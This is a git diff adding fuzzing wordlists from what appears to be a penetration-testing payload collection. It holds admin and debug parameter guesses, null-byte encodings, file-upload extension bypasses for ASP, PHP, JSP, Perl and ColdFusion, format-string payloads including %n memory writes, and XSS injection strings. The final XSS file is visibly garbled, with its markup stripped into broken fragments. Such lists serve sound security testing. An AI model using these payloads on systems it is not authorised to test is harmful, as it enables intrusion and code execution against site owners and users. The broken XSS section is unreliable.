diff --git a/attack/business-logic/CommonDebugParamNames.txt b/attack/business-logic/CommonDebugParamNames.txt new file mode 100644 index 0000000..a04130b --- /dev/null +++ b/attack/business-logic/CommonDebugParamNames.txt @@ -0,0 +1,40 @@ +7357=1 +7357=true +7357=y +7357=yes +access=1 +access=true +access=y +access=yes +adm=1 +adm1n=1 +adm1n=true +adm1n=y +adm1n=yes +admin=1 +admin=true +admin=y +admin=yes +adm=true +adm=y +adm=yes +dbg=1 +dbg=true +dbg=y +dbg=yes +debug=1 +debug=true +debug=y +debug=yes +edit=1 +edit=true +edit=y +edit=yes +grant=1 +grant=true +grant=y +grant=yes +test=1 +test=true +test=y +test=yes diff --git a/attack/business-logic/CommonMethodNames.txt b/attack/business-logic/CommonMethodNames.txt new file mode 100644 index 0000000..a40696b --- /dev/null +++ b/attack/business-logic/CommonMethodNames.txt @@ -0,0 +1,40 @@ +get +put +send +delete +remove +create +add +move +show +list +query +search +view +open +show +download +edit +change +alter +modify +test +update +save +load +close +make +upload +rename +reset +cancel +admin +demo +verify +vrfy +on +off +0 +1 +enable +disable diff --git a/attack/control-chars/NullByteRepresentations.txt b/attack/control-chars/NullByteRepresentations.txt new file mode 100644 index 0000000..cfd5654 --- /dev/null +++ b/attack/control-chars/NullByteRepresentations.txt @@ -0,0 +1,30 @@ +%00 +\x00 +\x00\ +\u0000 +\u0000 +\0 +\0\ +\00 +\00\ +\000 +\000\ +\z +\z\ +NUL +NULL +0x00 +%00%00 +\x00\x00 +\x00\x00\ +\u0000\u0000 +\u0000\u0000\ +\0\0 +\0\0\ +%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00 +%C0%80 +%E0%80%80 +%F0%80%80%80 +%F8%80%80%80%80 +%FC%80%80%80%80%80 +%FE%80%80%80%80%80%80 diff --git a/attack/disclosure-directory/directory-indexing-generic.txt b/attack/disclosure-directory/directory-indexing-generic.txt new file mode 100644 index 0000000..4ca0873 --- /dev/null +++ b/attack/disclosure-directory/directory-indexing-generic.txt @@ -0,0 +1,10 @@ +/%3f.jsp +/?M=D +/?S=D +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +/cgi-bin/test-cgi?/* +/cgi-bin/test-cgi?* +/%00/ +/%2e/ +/%2f/ +/%5c/ diff --git a/attack/file-upload/alt-extensions-asp.txt b/attack/file-upload/alt-extensions-asp.txt new file mode 100644 index 0000000..9d56377 --- /dev/null +++ b/attack/file-upload/alt-extensions-asp.txt @@ -0,0 +1,30 @@ +asp +aspx +asa +aSP +aSpx +aSa +asp%20%20%20 +aspx%20%20%20 +asa%20%20%20 +aSP%20%20%20 +aSpx%20%20%20 +aSa%20%20%20 +asp...... +aspx...... +asa...... +aSP...... +aSpx...... +aSa...... +asp%20%20%20...%20.%20.. +aspx%20%20%20...%20.%20.. +asa%20%20%20...%20.%20.. +aSP%20%20%20...%20.%20.. +aSpx%20%20%20...%20.%20.. +aSa%20%20%20...%20.%20.. +asp%00 +aspx%00 +asa%00 +aSp%00 +aSpx%00 +aSa%00 diff --git a/attack/file-upload/alt-extensions-coldfusion.txt b/attack/file-upload/alt-extensions-coldfusion.txt new file mode 100644 index 0000000..7f68130 --- /dev/null +++ b/attack/file-upload/alt-extensions-coldfusion.txt @@ -0,0 +1,40 @@ +cfm +cfml +cfc +dbm +cFm +cFml +cFc +dBm +cfm%20%20%20 +cfml%20%20%20 +cfc%20%20%20 +dbm%20%20%20 +cFm%20%20%20 +cFml%20%20%20 +cFc%20%20%20 +dBm%20%20%20 +cfm...... +cfml...... +cfc....... +dbm...... +cFm...... +cFml...... +cFc...... +dBm...... +cfm%20%20%20...%20.%20.. +cfml%20%20%20...%20.%20.. +cfc%20%20%20...%20.%20.. +dbm%20%20%20...%20.%20.. +cFm%20%20%20...%20.%20.. +cFml%20%20%20...%20.%20.. +cFc%20%20%20...%20.%20.. +dBm%20%20%20...%20.%20.. +cfm%00 +cfml%00 +cfc%00 +dbm%00 +cFm%00 +cFml%00 +cFc%00 +dBm%00 diff --git a/attack/file-upload/alt-extensions-jsp.txt b/attack/file-upload/alt-extensions-jsp.txt new file mode 100644 index 0000000..0e74ea6 --- /dev/null +++ b/attack/file-upload/alt-extensions-jsp.txt @@ -0,0 +1,50 @@ +jsp +jspx +jsw +jsv +jspf +jSp +jSpx +jSw +jSv +jSpf +jSp%00 +jSp%20%20%20 +jSp%20%20%20...%20.%20..a +jSp...... +jSpf%00 +jSpf%20%20%20 +jSpf%20%20%20...%20.%20..a +jSpf...... +jSpx%00 +jSpx%20%20%20 +jSpx%20%20%20...%20.%20..a +jSpx...... +jSv%00 +jSv%20%20%20 +jSv%20%20%20...%20.%20..a +jSv...... +jSw%00 +jSw%20%20%20 +jSw%20%20%20...%20.%20..a +jSw...... +jsp%00 +jsp%20%20%20 +jsp%20%20%20...%20.%20..a +jsp...... +jspf%00 +jspf%20%20%20 +jspf%20%20%20...%20.%20..a +jspf...... +jspx%00 +jspx%20%20%20 +jspx%20%20%20...%20.%20..a +jspx...... +jsv%00 +jsv%20%20%20 +jsv%20%20%20...%20.%20..a +jsv...... +jsw%00 +jsw%20%20%20 +jsw%20%20%20...%20.%20..a +jsw...... diff --git a/attack/file-upload/alt-extensions-perl.txt b/attack/file-upload/alt-extensions-perl.txt new file mode 100644 index 0000000..615dfec --- /dev/null +++ b/attack/file-upload/alt-extensions-perl.txt @@ -0,0 +1,33 @@ +# .pm .lib cannot be called directly, must be called as modules +pl +pm +cgi +pL +pM +cGi +lib +lIb +cGi%00 +cGi%20%20%20 +cGi...... +cgi%00 +cgi%20%20%20 +cgi...... +lIb%00 +lIb%20%20%20 +lIb...... +lib%00 +lib%20%20%20 +lib...... +pL%00 +pL%20%20%20 +pL...... +pM%00 +pM%20%20%20 +pM...... +pl%00 +pl%20%20%20 +pl...... +pm%00 +pm%20%20%20 +pm...... diff --git a/attack/file-upload/alt-extensions-php.txt b/attack/file-upload/alt-extensions-php.txt new file mode 100644 index 0000000..5cf7e64 --- /dev/null +++ b/attack/file-upload/alt-extensions-php.txt @@ -0,0 +1,60 @@ +phtml +php +php3 +php4 +php5 +inc +pHtml +pHp +pHp3 +pHp4 +pHp5 +iNc +iNc%00 +iNc%20%20%20 +iNc%20%20%20...%20.%20.. +iNc...... +inc%00 +inc%20%20%20 +inc%20%20%20...%20.%20.. +inc...... +pHp%00 +pHp%20%20%20 +pHp%20%20%20...%20.%20.. +pHp...... +pHp3%00 +pHp3%20%20%20 +pHp3%20%20%20...%20.%20.. +pHp3...... +pHp4%00 +pHp4%20%20%20 +pHp4%20%20%20...%20.%20.. +pHp4...... +pHp5%00 +pHp5%20%20%20 +pHp5%20%20%20...%20.%20.. +pHp5...... +pHtml%00 +pHtml%20%20%20 +pHtml%20%20%20...%20.%20.. +pHtml...... +php%00 +php%20%20%20 +php%20%20%20...%20.%20.. +php...... +php3%00 +php3%20%20%20 +php3%20%20%20...%20.%20.. +php3...... +php4%00 +php4%20%20%20 +php4%20%20%20...%20.%20.. +php4...... +php5%00 +php5%20%20%20 +php5%20%20%20...%20.%20.. +php5...... +phtml%00 +phtml%20%20%20 +phtml%20%20%20...%20.%20.. +phtml...... diff --git a/attack/file-upload/file-ul-filter-bypass-commonly-writable-directories.txt b/attack/file-upload/file-ul-filter-bypass-commonly-writable-directories.txt new file mode 100644 index 0000000..678ac36 --- /dev/null +++ b/attack/file-upload/file-ul-filter-bypass-commonly-writable-directories.txt @@ -0,0 +1,9 @@ +templates_compiled +templates_c +templates +temporary +images +cache +temp +files +tmp diff --git a/attack/file-upload/file-ul-filter-bypass-microsoft-asp-filetype-bf.txt b/attack/file-upload/file-ul-filter-bypass-microsoft-asp-filetype-bf.txt new file mode 100644 index 0000000..3a5edde --- /dev/null +++ b/attack/file-upload/file-ul-filter-bypass-microsoft-asp-filetype-bf.txt @@ -0,0 +1,8 @@ +{ASPSCRIPT} +{ASPSCRIPT}.{EXT} +{ASPSCRIPT}; +{ASPSCRIPT};.{EXT} +{ASPSCRIPT}%00 +{ASPSCRIPT}%00.{EXT} +{ASPSCRIPT}::data%00. +{ASPSCRIPT}::data%00.{EXT} diff --git a/attack/file-upload/file-ul-filter-bypass-microsoft-asp.txt b/attack/file-upload/file-ul-filter-bypass-microsoft-asp.txt new file mode 100644 index 0000000..75686ec --- /dev/null +++ b/attack/file-upload/file-ul-filter-bypass-microsoft-asp.txt @@ -0,0 +1,58 @@ +{ASPSCRIPT} +{ASPSCRIPT}; +{ASPSCRIPT};.jpg +{ASPSCRIPT};.pdf +{ASPSCRIPT};.html +{ASPSCRIPT};.htm +{ASPSCRIPT};.txt +{ASPSCRIPT};.xyz +{ASPSCRIPT};.zip +{ASPSCRIPT};.tgz +{ASPSCRIPT};.doc +{ASPSCRIPT};.docx +{ASPSCRIPT};.xls +{ASPSCRIPT};.xlsx +{ASPSCRIPT}%00.jpg +{ASPSCRIPT}%00.pdf +{ASPSCRIPT}%00.html +{ASPSCRIPT}%00.txt +{ASPSCRIPT}%00.xyz +{ASPSCRIPT}%00.tgz +{ASPSCRIPT}%00.zip +{ASPSCRIPT}%00.doc +{ASPSCRIPT}%00.docx +{ASPSCRIPT}%00 +{ASPSCRIPT}::data%00.jpg +{ASPSCRIPT}::data%00.pdf +{ASPSCRIPT}::data%00.html +{ASPSCRIPT}::data%00.txt +{ASPSCRIPT}::data%00.zip +{ASPSCRIPT}::data%00.doc +{ASPSCRIPT}::data%00.xls +{ASPSCRIPT}%00%20%20%20 +{ASPSCRIPT}%00%20%20%20...%20.%20.. +{ASPSCRIPT}%00...... +{ASPSCRIPT}%20%20%20 +{ASPSCRIPT}%20%20%20...%20.%20.. +{ASPSCRIPT}...... +{ASPSCRIPT}::data%00%%20%20%20 +{ASPSCRIPT}::data%00%%20%20%20...%20.%20.. +{ASPSCRIPT}::data%00%...... +{ASPSCRIPT}%00%20%20%20;.jpg +{ASPSCRIPT}%00%20%20%20;.doc +{ASPSCRIPT}%00%20%20%20...%20.%20..;.jpg +{ASPSCRIPT}%00%20%20%20...%20.%20..;.doc +{ASPSCRIPT}%00......;.jpg +{ASPSCRIPT}%00......;.doc +{ASPSCRIPT}%20%20%20;.jpg +{ASPSCRIPT}%20%20%20;.doc +{ASPSCRIPT}%20%20%20...%20.%20..;.jpg +{ASPSCRIPT}%20%20%20...%20.%20..;.doc +{ASPSCRIPT}......;.jpg +{ASPSCRIPT}......;.doc +{ASPSCRIPT}::data%00%%20%20%20;.jpg +{ASPSCRIPT}::data%00%%20%20%20;.doc +{ASPSCRIPT}::data%00%%20%20%20...%20.%20..;.jpg +{ASPSCRIPT}::data%00%%20%20%20...%20.%20..;.doc +{ASPSCRIPT}::data%00%......;.jpg +{ASPSCRIPT}::data%00%......;.doc diff --git a/attack/file-upload/file-ul-filter-bypass-ms-php.txt b/attack/file-upload/file-ul-filter-bypass-ms-php.txt new file mode 100644 index 0000000..d817a48 --- /dev/null +++ b/attack/file-upload/file-ul-filter-bypass-ms-php.txt @@ -0,0 +1,7 @@ +{PHPSCRIPT} +{PHPSCRIPT}.phtml +{PHPSCRIPT}.php.html +{PHPSCRIPT}.php::$DATA +{PHPSCRIPT}.php.php.rar +{PHPSCRIPT}.php.rar +{PHPSCRIPT}::$DATA diff --git a/attack/file-upload/file-ul-filter-bypass-x-platform-generic.txt b/attack/file-upload/file-ul-filter-bypass-x-platform-generic.txt new file mode 100644 index 0000000..2248011 --- /dev/null +++ b/attack/file-upload/file-ul-filter-bypass-x-platform-generic.txt @@ -0,0 +1,3 @@ +%00index.html +;index.html +%00 diff --git a/attack/file-upload/file-ul-filter-bypass-x-platform-php.txt b/attack/file-upload/file-ul-filter-bypass-x-platform-php.txt new file mode 100644 index 0000000..c45603c --- /dev/null +++ b/attack/file-upload/file-ul-filter-bypass-x-platform-php.txt @@ -0,0 +1,5 @@ +{PHPSCRIPT} +{PHPSCRIPT}.phtml +{PHPSCRIPT}.php.html +{PHPSCRIPT}.php.php.rar +{PHPSCRIPT}.php.rar diff --git a/attack/file-upload/invalid-filenames-linux.txt b/attack/file-upload/invalid-filenames-linux.txt new file mode 100644 index 0000000..076b875 --- /dev/null +++ b/attack/file-upload/invalid-filenames-linux.txt @@ -0,0 +1,7 @@ +/ + +\0 +/dev/null +/dev/null/foo +. +.. \ No newline at end of file diff --git a/attack/file-upload/invalid-filenames-microsoft.txt b/attack/file-upload/invalid-filenames-microsoft.txt new file mode 100644 index 0000000..0d49d7d --- /dev/null +++ b/attack/file-upload/invalid-filenames-microsoft.txt @@ -0,0 +1,31 @@ +CON.{EXT} +PRN.{EXT} +AUX.{EXT} +CLOCK$.{EXT} +NUL.{EXT} +COM1.{EXT} +COM2.{EXT} +COM3.{EXT} +COM4.{EXT} +COM5.{EXT} +COM6.{EXT} +COM7.{EXT} +COM8.{EXT} +COM9.{EXT} +LPT1.{EXT} +LPT2.{EXT} +LPT3.{EXT} +LPT4.{EXT} +LPT5.{EXT} +LPT6.{EXT} +LPT7.{EXT} +LPT8.{EXT} +LPT9.{EXT} +*.{EXT} +".{EXT} +[.{EXT} +].{EXT} +:.{EXT} +|.{EXT} +=.{EXT} +,.{EXT} diff --git a/attack/file-upload/invalid-filesystem-chars-microsoft.txt b/attack/file-upload/invalid-filesystem-chars-microsoft.txt new file mode 100644 index 0000000..c3b1002 --- /dev/null +++ b/attack/file-upload/invalid-filesystem-chars-microsoft.txt @@ -0,0 +1,12 @@ +* +. +" +/ +\ +[ +] +: +; +| += +, diff --git a/attack/file-upload/invalid-filesystem-chars-osx.txt b/attack/file-upload/invalid-filesystem-chars-osx.txt new file mode 100644 index 0000000..44987eb --- /dev/null +++ b/attack/file-upload/invalid-filesystem-chars-osx.txt @@ -0,0 +1,3 @@ +# list of invalid characters for osx - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing. +# fuzz these into a filename during upload attempts +: diff --git a/attack/format-strings/format-strings.txt b/attack/format-strings/format-strings.txt new file mode 100644 index 0000000..40df67c --- /dev/null +++ b/attack/format-strings/format-strings.txt @@ -0,0 +1,57 @@ +%s%p%x%d +%p%p%p%p +%x%x%x%x +%d%d%d%d +%s%s%s%s +%99999999999s +%08x +%20d +%20n +%20x +%20s +%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d +%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i +%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o +%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u +%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x +%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X +%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a +%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A +%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e +%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E +%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f +%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F +%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g +%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G +%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s +%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p +%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% +XXXXX.%p +XXXXX`perl -e 'print ".%p" x 80'` +`perl -e 'print ".%p" x 80'`%n +%08x.%08x.%08x.%08x.%08x\n +XXX0_%08x.%08x.%08x.%08x.%08x\n +%.16705u%2\$hn +\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s| +AAAAA%c +AAAAA%d +AAAAA%e +AAAAA%f +AAAAA%I +AAAAA%o +AAAAA%p +AAAAA%s +AAAAA%x +AAAAA%n +ppppp%c +ppppp%d +ppppp%e +ppppp%f +ppppp%I +ppppp%o +ppppp%p +ppppp%s +ppppp%x +ppppp%n +%@ +%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@ diff --git a/attack/html_js_fuzz/HTML5sec_Injections.txt b/attack/html_js_fuzz/HTML5sec_Injections.txt new file mode 100644 index 0000000..f319df2 --- /dev/null +++ b/attack/html_js_fuzz/HTML5sec_Injections.txt @@ -0,0 +1,142 @@ +
+&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi +&alert&A7&(1)&R&UA;&&<&A9&11/script&X&> +0? :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk')) + + + + +X + + +





...



+01 + + +X + + +¼script ¾alert(1)//¼/script ¾ + + + +
+1 +;1 ++ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input); + +1 +@import "data:,*%7bx:expression(write(1))%7D"; + +
+XXXXXX +1 +1 +XXX + + +><image xlink:href=" + +
  • +XXX +Hello +X +
    XXX
    +
    XXX
    + + + + + + + + +